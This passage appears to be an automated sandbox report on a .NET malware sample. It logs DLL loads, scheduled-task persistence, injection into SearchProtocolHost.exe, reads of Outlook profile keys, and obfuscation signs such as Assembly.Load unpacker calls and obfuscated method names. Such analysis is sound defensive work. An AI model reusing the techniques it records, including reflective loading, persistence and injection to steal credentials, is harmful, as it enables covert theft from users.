Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: FGGx944Qu7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FGGx944Qu7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usFxdnRPYjnb.exe, 0000000F.00000000.1869462009.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032183269.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FGGx944Qu7.exe, FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdbUGP source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdb source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: FGGx944Qu7.exe, Form1.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"EmuLister"}}, (string[])null, (bool[])null)
Source: TBsjWljiCpR.exe.0.dr, Form1.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"EmuLister"}}, (string[])null, (bool[])null)

.NET source code contains potential unpacker

Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.4019970.6.raw.unpack, LoginForm.cs	.Net Code: _200E_202E_200D_206C_202E_206B_200C_200E_206F_206F_202A_206E_202D_206B_206F_202A_202A_206C_206C_200C_206B_206E_202A_206D_200D_202B_200F_206A_202E_200B_202A_202E_202B_202C_200C_202A_206C_202A_206B_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041E15D push FFFFFFB6h; retf	8_2_0041E191
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041E19F push FFFFFFB6h; retf	8_2_0041E191
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00416234 pushfd ; iretd	8_2_0041624C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00407A3A push ebx; iretd	8_2_00407A3C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401A3D push ds; ret	8_2_00401A51
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004162B5 push edi; iretd	8_2_004162C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040CB07 push edi; retf	8_2_0040CB08
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041838B push cs; retf	8_2_0041838C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040CD7A push ss; iretd	8_2_0040CD8C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00403500 push eax; ret	8_2_00403502
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040AD09 push edx; ret	8_2_0040AD0A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00413D36 push esp; retf	8_2_00413D3F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401D80 push 720ECF9Eh; iretd	8_2_0040224B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040DF0F push edx; iretd	8_2_0040DF10
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD push ecx; mov dword ptr [esp], ecx	8_2_015F09B6
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C54D pushfd ; ret	13_2_0108C54E
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C54F push 8B010167h; ret	13_2_0108C554
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010409AD push ecx; mov dword ptr [esp], ecx	13_2_010409B6
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C9D7 push edi; ret	13_2_0108C9D9
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01011200 push eax; iretd	13_2_01011369
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01011FEC push eax; iretd	13_2_01011FED
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01097E99 push ecx; ret	13_2_01097EAC
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_00418294 push edi; iretd	13_2_00418296
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0041838B push cs; retf	13_2_0041838C

Source: FGGx944Qu7.exe	Static PE information: section name: .text entropy: 7.9850458366692925
Source: TBsjWljiCpR.exe.0.dr	Static PE information: section name: .text entropy: 7.9850458366692925

Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
